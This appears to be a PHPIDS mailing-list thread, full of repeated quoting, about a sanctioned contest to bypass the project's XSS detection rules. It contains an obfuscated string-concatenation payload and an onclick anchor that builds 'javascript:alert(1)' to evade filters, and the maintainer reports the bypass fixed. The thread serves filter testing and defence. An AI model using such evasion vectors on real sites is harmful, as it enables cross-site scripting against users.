After talking to Christian and SirDarckCat I decided to make this post - even if it may sound a little bit provocative ;) We spend lots of time with the rules and except from some details we are pretty content with them.
So if you like and find some time give them a new try - anyone who will manage to create an XSS on the demo page will be mentioned in the next release notes and will (if wanted) get a dedicated interview on the blog (SirDarckCat's interview will appear the next days - he was again quicker than light with some vectors mentioned in the release post).
Allowed are the following browsers: - Firefox 1.5+ - IE 6+ - Opera 9+ - Safari 2+ - Konqueror 3.5+
Any vector which will be able to create an alert/content change via JS on the demo page counts - as long as a PoC of what form ever can be provided. A similar contest will follow the next weeks for SQL Injection.
Make Giorgios threesome a foursome. obj[name]() works as well, giving access to all top level functions/ objects. Low impact in general, but this might be combined with other things...
> Make Giorgios threesome a foursome. > obj[name]() works as well, giving access to all top level functions/ > objects. > Low impact in general, but this might be combined with other things...
> After talking to Christian and SirDarckCat I decided to make this post > - even if it may sound a little bit provocative ;) We spend lots of > time with the rules and except from some details we are pretty content > with them.
> So if you like and find some time give them a new try - anyone who > will manage to create an XSS on the demo page will be mentioned in the > next release notes and will (if wanted) get a dedicated interview on > the blog (SirDarckCat's interview will appear the next days - he was > again quicker than light with some vectors mentioned in the release > post).
> Allowed are the following browsers: > - Firefox 1.5+ > - IE 6+ > - Opera 9+ > - Safari 2+ > - Konqueror 3.5+
> Any vector which will be able to create an alert/content change via JS > on the demo page counts - as long as a PoC of what form ever can be > provided. A similar contest will follow the next weeks for SQL > Injection.
> After talking to Christian and SirDarckCat I decided to make this post > - even if it may sound a little bit provocative ;) We spend lots of > time with the rules and except from some details we are pretty content > with them.
> So if you like and find some time give them a new try - anyone who > will manage to create an XSS on the demo page will be mentioned in the > next release notes and will (if wanted) get a dedicated interview on > the blog (SirDarckCat's interview will appear the next days - he was > again quicker than light with some vectors mentioned in the release > post).
> Allowed are the following browsers: > - Firefox 1.5+ > - IE 6+ > - Opera 9+ > - Safari 2+ > - Konqueror 3.5+
> Any vector which will be able to create an alert/content change via JS > on the demo page counts - as long as a PoC of what form ever can be > provided. A similar contest will follow the next weeks for SQL > Injection.
Now this is a strange one:- h1=''+'hr'+'';h2=''+'ef'+'';h3=h1+h2;s1=''+'jav'+'';s2=''+'ascri'+'';s3=''+ 'pt'+'';s4=''==''?':': 0;s5=''+'aler'+'';s6=''+'t'+'';s7=''==''?'(1)': 0;s8=s1+s2+s3+s4+s5+s6+s7;p1=previousSibling;p1.nextSibling[h3]=s8;
It should work cause I tested it locally however it doesn't seem to execute on your site. I've no idea why, maybe some characters are cause the onclick handler to produce invalid data. The code above get pass your filters though,
Tested this is Firefox locally and it worked:- <a onclick="h1=''+'hr'+'';h2=''+'ef'+'';h3=h1+h2;s1=''+'jav'+'';s2=''+'ascri'+ '';s3=''+'pt'+'';s4=''==''?':': 0;s5=''+'aler'+'';s6=''+'t'+'';s7=''==''?'(1)': 0;s8=s1+s2+s3+s4+s5+s6+s7;p1=previousSibling;p1.nextSibling[h3]=s8;" href="?test=test">Test</a>
On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com> wrote:
> After talking to Christian and SirDarckCat I decided to make this post > - even if it may sound a little bit provocative ;) We spend lots of > time with the rules and except from some details we are pretty content > with them.
> So if you like and find some time give them a new try - anyone who > will manage to create an XSS on the demo page will be mentioned in the > next release notes and will (if wanted) get a dedicated interview on > the blog (SirDarckCat's interview will appear the next days - he was > again quicker than light with some vectors mentioned in the release > post).
> Allowed are the following browsers: > - Firefox 1.5+ > - IE 6+ > - Opera 9+ > - Safari 2+ > - Konqueror 3.5+
> Any vector which will be able to create an alert/content change via JS > on the demo page counts - as long as a PoC of what form ever can be > provided. A similar contest will follow the next weeks for SQL > Injection.
> It should work cause I tested it locally however it doesn't seem to > execute on your site. I've no idea why, maybe some characters are > cause the onclick handler to produce invalid data. The code above get > pass your filters though,
> Tested this is Firefox locally and it worked:- > <a
> On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com> > wrote: > > Hi!
> > After talking to Christian and SirDarckCat I decided to make this post > > - even if it may sound a little bit provocative ;) We spend lots of > > time with the rules and except from some details we are pretty content > > with them.
> > So if you like and find some time give them a new try - anyone who > > will manage to create an XSS on the demo page will be mentioned in the > > next release notes and will (if wanted) get a dedicated interview on > > the blog (SirDarckCat's interview will appear the next days - he was > > again quicker than light with some vectors mentioned in the release > > post).
> > Allowed are the following browsers: > > - Firefox 1.5+ > > - IE 6+ > > - Opera 9+ > > - Safari 2+ > > - Konqueror 3.5+
> > Any vector which will be able to create an alert/content change via JS > > on the demo page counts - as long as a PoC of what form ever can be > > provided. A similar contest will follow the next weeks for SQL > > Injection.
> > It should work cause I tested it locally however it doesn't seem to > > execute on your site. I've no idea why, maybe some characters are > > cause the onclick handler to produce invalid data. The code above get > > pass your filters though,
> > Tested this is Firefox locally and it worked:- > > <a
> > On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com> > > wrote: > > > Hi!
> > > After talking to Christian and SirDarckCat I decided to make this post > > > - even if it may sound a little bit provocative ;) We spend lots of > > > time with the rules and except from some details we are pretty content > > > with them.
> > > So if you like and find some time give them a new try - anyone who > > > will manage to create an XSS on the demo page will be mentioned in the > > > next release notes and will (if wanted) get a dedicated interview on > > > the blog (SirDarckCat's interview will appear the next days - he was > > > again quicker than light with some vectors mentioned in the release > > > post).
> > > Allowed are the following browsers: > > > - Firefox 1.5+ > > > - IE 6+ > > > - Opera 9+ > > > - Safari 2+ > > > - Konqueror 3.5+
> > > Any vector which will be able to create an alert/content change via JS > > > on the demo page counts - as long as a PoC of what form ever can be > > > provided. A similar contest will follow the next weeks for SQL > > > Injection.
> > > It should work cause I tested it locally however it doesn't seem to > > > execute on your site. I've no idea why, maybe some characters are > > > cause the onclick handler to produce invalid data. The code above get > > > pass your filters though,
> > > Tested this is Firefox locally and it worked:- > > > <a
> > > On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com> > > > wrote: > > > > Hi!
> > > > After talking to Christian and SirDarckCat I decided to make this post > > > > - even if it may sound a little bit provocative ;) We spend lots of > > > > time with the rules and except from some details we are pretty content > > > > with them.
> > > > So if you like and find some time give them a new try - anyone who > > > > will manage to create an XSS on the demo page will be mentioned in the > > > > next release notes and will (if wanted) get a dedicated interview on > > > > the blog (SirDarckCat's interview will appear the next days - he was > > > > again quicker than light with some vectors mentioned in the release > > > > post).
> > > > Any vector which will be able to create an alert/content change via JS > > > > on the demo page counts - as long as a PoC of what form ever can be > > > > provided. A similar contest will follow the next weeks for SQL > > > > Injection.
> > > Yep - very nice and strange one indeed! But fixed. The concatenation > > > algorithm has received a recode - hope that will stop the next wave ;)
> > > > It should work cause I tested it locally however it doesn't seem to > > > > execute on your site. I've no idea why, maybe some characters are > > > > cause the onclick handler to produce invalid data. The code above get > > > > pass your filters though,
> > > > Tested this is Firefox locally and it worked:- > > > > <a
> > > > On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com> > > > > wrote: > > > > > Hi!
> > > > > After talking to Christian and SirDarckCat I decided to make this post > > > > > - even if it may sound a little bit provocative ;) We spend lots of > > > > > time with the rules and except from some details we are pretty content > > > > > with them.
> > > > > So if you like and find some time give them a new try - anyone who > > > > > will manage to create an XSS on the demo page will be mentioned in the > > > > > next release notes and will (if wanted) get a dedicated interview on > > > > > the blog (SirDarckCat's interview will appear the next days - he was > > > > > again quicker than light with some vectors mentioned in the release > > > > > post).
> > > > > Any vector which will be able to create an alert/content change via JS > > > > > on the demo page counts - as long as a PoC of what form ever can be > > > > > provided. A similar contest will follow the next weeks for SQL > > > > > Injection.
> > > > > Greetings and have fun! > > > > > .mario
> > > > Yep - very nice and strange one indeed! But fixed. The concatenation > > > > algorithm has received a recode - hope that will stop the next wave ;)
> > > > > It should work cause I tested it locally however it doesn't seem to > > > > > execute on your site. I've no idea why, maybe some characters are > > > > > cause the onclick handler to produce invalid data. The code above get > > > > > pass your filters though,
> > > > > Tested this is Firefox locally and it worked:- > > > > > <a
> > > > > On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com> > > > > > wrote: > > > > > > Hi!
> > > > > > After talking to Christian and SirDarckCat I decided to make this post > > > > > > - even if it may sound a little bit provocative ;) We spend lots of > > > > > > time with the rules and except from some details we are pretty content > > > > > > with them.
> > > > > > So if you like and find some time give them a new try - anyone who > > > > > > will manage to create an XSS on the demo page will be mentioned in the > > > > > > next release notes and will (if wanted) get a dedicated interview on > > > > > > the blog (SirDarckCat's interview will appear the next days - he was > > > > > > again quicker than light with some vectors mentioned in the release > > > > > > post).
> > > > > > Any vector which will be able to create an alert/content change via JS > > > > > > on the demo page counts - as long as a PoC of what form ever can be > > > > > > provided. A similar contest will follow the next weeks for SQL > > > > > > Injection.
> > > > > > Greetings and have fun! > > > > > > .mario
> > > > > Yep - very nice and strange one indeed! But fixed. The concatenation > > > > > algorithm has received a recode - hope that will stop the next wave ;)
> > > > > > It should work cause I tested it locally however it doesn't seem to > > > > > > execute on your site. I've no idea why, maybe some characters are > > > > > > cause the onclick handler to produce invalid data. The code above get > > > > > > pass your filters though,
> > > > > > Tested this is Firefox locally and it worked:- > > > > > > <a
> > > > > > On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com> > > > > > > wrote: > > > > > > > Hi!
> > > > > > > After talking to Christian and SirDarckCat I decided to make this post > > > > > > > - even if it may sound a little bit provocative ;) We spend lots of > > > > > > > time with the rules and except from some details we are pretty content > > > > > > > with them.
> > > > > > > So if you like and find some time give them a new try - anyone who > > > > > > > will manage to create an XSS on the demo page will be mentioned in the > > > > > > > next release notes and will (if wanted) get a dedicated interview on > > > > > > > the blog (SirDarckCat's interview will appear the next days - he was > > > > > > > again quicker than light with some vectors mentioned in the release > > > > > > > post).
> > > > > > > Any vector which will be able to create an alert/content change via JS > > > > > > > on the demo page counts - as long as a PoC of what form ever can be > > > > > > > provided. A similar contest will follow the next weeks for SQL > > > > > > > Injection.
> > > > > > > Greetings and have fun! > > > > > > > .mario
I've written a simple script to conduct concatenation attacks, so if anyone wants to improve it or add new vectors please do and send them to the group. The reason I think it is need is because of the amount of possible combinations and having a automated tool like this would help with unit testing of the code. You never know when a vector could creep back in you see.
Another thing I've thought about is Javascript based XSS protection, I don't know if this is outside the projects goal but something like this would prevent window.name exploits:-
> I've written a simple script to conduct concatenation attacks, so if > anyone wants to improve it or add new vectors please do and send them > to the group. > The reason I think it is need is because of the amount of possible > combinations and having a automated tool like this would help with > unit testing of the code. You never know when a vector could creep > back in you see.
It's a good idea but it's way outside the project - the IDS will provide no protection - just monitoring and information on possible attacks. I had the PHPIPS idea in my head too for some time but there are so many other tools and ways to solve that...
> Another thing I've thought about is Javascript based XSS protection, I > don't know if this is outside the projects goal but something like > this would prevent window.name exploits:-
> Which the PHPIDS could include in the header of the page.
> On Sep 10, 9:40 am, Gareth <gazhe...@gmail.com> wrote: > > Hi All
> > I've written a simple script to conduct concatenation attacks, so if > > anyone wants to improve it or add new vectors please do and send them > > to the group. > > The reason I think it is need is because of the amount of possible > > combinations and having a automated tool like this would help with > > unit testing of the code. You never know when a vector could creep > > back in you see.
> Mario: do you prefer these posted here or at sla.ckers or both?
> On Sep 10, 4:16 am, "Mario Heiderich" <mario.heider...@googlemail.com> > wrote: > > Wow - that's a nice one. I love the trick regex 1 preparing regex 2 for > > being in the right format to be executed.
> > Mario: do you prefer these posted here or at sla.ckers or both?
> > On Sep 10, 4:16 am, "Mario Heiderich" <mario.heider...@googlemail.com> > > wrote: > > > Wow - that's a nice one. I love the trick regex 1 preparing regex 2 for > > > being in the right format to be executed.
> > > Mario: do you prefer these posted here or at sla.ckers or both?
> > > On Sep 10, 4:16 am, "Mario Heiderich" <mario.heider...@googlemail.com> > > > wrote: > > > > Wow - that's a nice one. I love the trick regex 1 preparing regex 2 for > > > > being in the right format to be executed.
> After talking to Christian and SirDarckCat I decided to make this post > - even if it may sound a little bit provocative ;) We spend lots of > time with the rules and except from some details we are pretty content > with them.
> So if you like and find some time give them a new try - anyone who > will manage to create an XSS on the demo page will be mentioned in the > next release notes and will (if wanted) get a dedicated interview on > the blog (SirDarckCat's interview will appear the next days - he was > again quicker than light with some vectors mentioned in the release > post).
> Allowed are the following browsers: > - Firefox 1.5+ > - IE 6+ > - Opera 9+ > - Safari 2+ > - Konqueror 3.5+
> Any vector which will be able to create an alert/content change via JS > on the demo page counts - as long as a PoC of what form ever can be > provided. A similar contest will follow the next weeks for SQL > Injection.